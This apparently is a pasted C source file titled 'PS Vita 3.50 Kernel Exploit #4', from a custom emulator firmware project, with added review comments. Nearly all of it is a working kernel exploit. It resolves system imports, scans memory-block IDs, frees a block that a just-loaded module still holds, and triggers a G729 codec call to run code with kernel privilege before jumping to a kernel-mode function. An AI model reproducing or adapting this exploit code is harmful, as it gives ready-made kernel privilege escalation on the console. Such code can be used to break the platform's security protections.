
PS Vita 3.50 Kernel Exploit #4

a guest
Apr 18th, 2015
  1. /*
  2.     Custom Emulator Firmware
  3.     Copyright (C) 2012-2015, Total_Noob
  4.  
  5.     This program is free software: you can redistribute it and/or modify
  6.     it under the terms of the GNU General Public License as published by
  7.     the Free Software Foundation, either version 3 of the License, or
  8.     (at your option) any later version.
  9.  
  10.     This program is distributed in the hope that it will be useful,
  11.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  12.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13.     GNU General Public License for more details.
  14.  
  15.     You should have received a copy of the GNU General Public License
  16.     along with this program.  If not, see <http://www.gnu.org/licenses/>.
  17. */
  18.  
  19. #include <common.h>
  20.  
  21. #include "main.h"
  22. #include "libc.h"
  23. #include "utils.h"
  24.  
/* Upper bound on the number of memory-block addresses recorded per UID scan
 * in doExploit(); both scans stop once this many blocks have been seen. */
#define MAX_UIDS 20

/* Addresses (bit 31 set) of the memory blocks found by doExploit()'s first
 * UID scan, in scan order.  The second scan compares its findings against
 * this array by index, so the order of the scan matters. */
u32 address_list[MAX_UIDS];

/* Resolved at run time in doExploit() via FindImport(); zero (NULL) until
 * then, as file-scope objects are.  They are file-scope rather than locals
 * because load_thread() needs them too. */
int (* _sceKernelExitDeleteThread)(int status);
int (* _sceUtility_private_7EBD6208)();
  31.  
/* Placeholder with no body: nothing is repaired in this build.  Kept so that
 * callers elsewhere in the project still link against the symbol. */
void RepairSysmem()
{
    return;
}
  35.  
/* Thread body for the thread-based variant of the "second module" load,
 * which doExploit() currently has commented out in favour of a direct call.
 * Invokes the sceUtility_private_7EBD6208 import (resolved by doExploit()
 * beforehand), then exits and deletes the calling thread with status 0.
 *
 * Returns whatever _sceKernelExitDeleteThread returns; on success that call
 * presumably does not return at all - confirm against the thread manager.
 * NOTE(review): the signature takes no (SceSize, void *) thread arguments;
 * the disabled sceKernelCreateThread call passes it as a thread entry anyway.
 */
int load_thread()
{
    int status = 0;

    _sceUtility_private_7EBD6208();

    status = _sceKernelExitDeleteThread(status);
    return status;
}
  41.  
/*
 * doExploit - user-mode entry point of the kernel exploit.
 *
 * Every kernel/utility entry point it needs is resolved at run time through
 * FindImport(library name, NID); a NULL result is routed to ErrorFlashScreen().
 * NOTE(review): FindImport() and ErrorFlashScreen() live outside this file.
 * If ErrorFlashScreen() can return, execution carries on here with NULL
 * function pointers - confirm it never returns.
 *
 * Sequence, as visible in this function:
 *   1. load PSP_MODULE_NP_DRM;
 *   2. allocate a 1-byte memory block and record which UIDs in a window
 *      around it resolve to an address with bit 31 set (address_list);
 *   3. load PSP_MODULE_AV_G729 and free the first such block that is not at
 *      the same position in the recorded list, i.e. one that appeared with
 *      the module while the module still owns it;
 *   4. call sceUtility_private_7EBD6208, write back the data cache, then
 *      call sceG729EncodeTermResource (marked by the author as the call that
 *      runs with kernel privilege - how the freed block is reused to get
 *      there is not visible in this file);
 *   5. adjust $sp/$s0 via inline asm and call kernel_function through a
 *      pointer with bit 31 set.
 *
 * The inline asm at the end writes $sp and $s0 behind the compiler's back and
 * therefore depends on the exact frame layout at that point.  Do not reorder,
 * inline or add code around it without re-checking the generated assembly.
 *
 * Known rough edges (not changed here, see notes inline): return values of
 * sceUtilityLoadModule and sceKernelAllocMemoryBlock are not checked, the
 * 1-byte probe block is never freed, and the three thread-manager imports are
 * resolved only for a code path that is commented out.
 */
void doExploit()
{
    /* Find imports in RAM */
    void (* _sceKernelDcacheWritebackAll)() = (void *)FindImport("UtilsForUser", 0x79D1C3FA);
    int (* _sceUtilityLoadModule)(int id) = (void *)FindImport("sceUtility", 0x2A2B3DE0);

    /* NOTE(review): only used by the thread-based load below, which is
     * commented out; they are still resolved and NULL-checked. */
    SceUID (* _sceKernelCreateThread)(const char *name, SceKernelThreadEntry entry, int initPriority, int stackSize, SceUInt attr, SceKernelThreadOptParam *option) = (void *)FindImport("ThreadManForUser", 0x446D8DE6);
    int (* _sceKernelStartThread)(SceUID thid, SceSize arglen, void *argp) = (void *)FindImport("ThreadManForUser", 0xF475845D);
    int (* _sceKernelWaitThreadEnd)(SceUID thid, SceUInt *timeout) = (void *)FindImport("ThreadManForUser", 0x278C0DF5);

    /* File-scope so load_thread() can reach them. */
    _sceKernelExitDeleteThread = (void *)FindImport("ThreadManForUser", 0x809CE29B);
    _sceUtility_private_7EBD6208 = (void *)FindImport("sceUtility_private", 0x7EBD6208);

    SceUID (* _sceKernelAllocMemoryBlock)(const char *name, int type, u32 size, void *params) = (void *)FindImport("SysMemUserForUser", 0xFE707FDF);
    int (* _sceKernelGetMemoryBlockAddr)(SceUID uid, void **ptr) = (void *)FindImport("SysMemUserForUser", 0xDB83A952);
    int (* _sceKernelFreeMemoryBlock)(SceUID uid) = (void *)FindImport("SysMemUserForUser", 0x50F61D8A);

    /* Abort (via ErrorFlashScreen) if any import failed to resolve. */
    if(!_sceKernelDcacheWritebackAll || !_sceUtilityLoadModule) ErrorFlashScreen();
    if(!_sceKernelCreateThread || !_sceKernelStartThread || !_sceKernelWaitThreadEnd) ErrorFlashScreen();
    if(!_sceKernelExitDeleteThread || !_sceUtility_private_7EBD6208) ErrorFlashScreen();
    if(!_sceKernelAllocMemoryBlock || !_sceKernelGetMemoryBlockAddr || !_sceKernelFreeMemoryBlock) ErrorFlashScreen();

    /* Load required module */
    /* NOTE(review): return value ignored; a failed load is not detected here. */
    _sceUtilityLoadModule(PSP_MODULE_NP_DRM);

    /* Probe allocation: its UID anchors the scan window below.  The block is
     * never freed.  NOTE(review): a negative (error) UID is not checked for,
     * and would make uid_max/uid_min meaningless. */
    SceUID new_uid = _sceKernelAllocMemoryBlock("", PSP_SMEM_High, 1, NULL);

    /* Scan window: from the top of the next 0x100000-sized band above new_uid
     * down 0x200000 values, stepping by 2 - presumably the UID granularity in
     * this range; confirm. */
    SceUID uid_max = ((new_uid & 0xFFF00000) | 0x000FFFFF) + 0x100000;
    SceUID uid_min = uid_max - 0x200000;

    int i;
    SceUID uid;

    /* First scan: record, in order, every UID in the window that resolves to
     * an address with bit 31 set.  The return value of
     * sceKernelGetMemoryBlockAddr is ignored; addr stays 0 when the call does
     * not write it, which the bit-31 test rejects.  (addr is a u32 handed
     * over as void ** - assumes a 32-bit pointer, true on the target.) */
    for(uid = uid_max, i = 0; uid > uid_min && i < MAX_UIDS; uid -= 2)
    {
        u32 addr = 0;
        _sceKernelGetMemoryBlockAddr(uid, (void *)&addr);

        if(addr & 0x80000000)
        {
            address_list[i] = addr;
            i++;
        }
    }

    /* Load first module */
    /* NOTE(review): return value ignored here as well. */
    _sceUtilityLoadModule(PSP_MODULE_AV_G729);

    int (* _sceG729EncodeTermResource)() = (void *)FindImport("sceG729", 0x94714D50);
    if(!_sceG729EncodeTermResource) ErrorFlashScreen();

    /* Set to 1 once a block has been freed.  NOTE(review): the name shadows
     * the C library free() if <stdlib.h> is ever included in this file. */
    int free = 0;

    /* Second scan: same window, same order.  The first block whose address
     * differs from the one recorded at the same index is taken to be one that
     * appeared with the module just loaded, and is freed while the module
     * presumably still references it.  Only one block is freed. */
    for(uid = uid_max, i = 0; uid > uid_min && i < MAX_UIDS; uid -= 2)
    {
        u32 addr = 0;
        _sceKernelGetMemoryBlockAddr(uid, (void *)&addr);

        if(addr & 0x80000000)
        {
            if(address_list[i] != addr)
            {
                _sceKernelFreeMemoryBlock(uid);
                free = 1;
                break;
            }

            i++;
        }
    }

    /* No new block found: nothing was freed, so the rest cannot work. */
    if(!free) ErrorFlashScreen();

    /* Load second module */
    /* Disabled variant: run the load on a separate thread (see load_thread()).
     * Kept for reference; the direct call below is what currently runs. */
/*  SceUID thid = _sceKernelCreateThread("load_thread", load_thread, 0x10, 0x1000, 0, NULL);
    _sceKernelStartThread(thid, 0, NULL);
    _sceKernelWaitThreadEnd(thid, NULL);*/
    _sceUtility_private_7EBD6208();

    /* Make sure everything written above is visible before the call that is
     * expected to run at kernel level. */
    _sceKernelDcacheWritebackAll();

    /* Execute with kernel privilege */
    _sceG729EncodeTermResource();

    /* Restore registers */
    /* MIPS: move $sp down 16 bytes, then copy $k1 into $s0.  Neither asm
     * statement declares clobbers, so the compiler is unaware $sp and $s0
     * changed; this only works for the frame layout the author observed.
     * NOTE(review): on this platform $k1 is presumably the kernel's mode /
     * syscall marker - confirm before touching this. */
    asm("addiu $sp, $sp, -16\n");
    asm("move $s0, $k1\n");

    /* Execute kernel function */
    /* kernel_function (defined elsewhere) is called through its address with
     * bit 31 set - the same bit the scans above test for.  Whether control
     * ever comes back here depends on kernel_function. */
    void (* execute)() = (void *)((u32)kernel_function | 0x80000000);
    execute();
}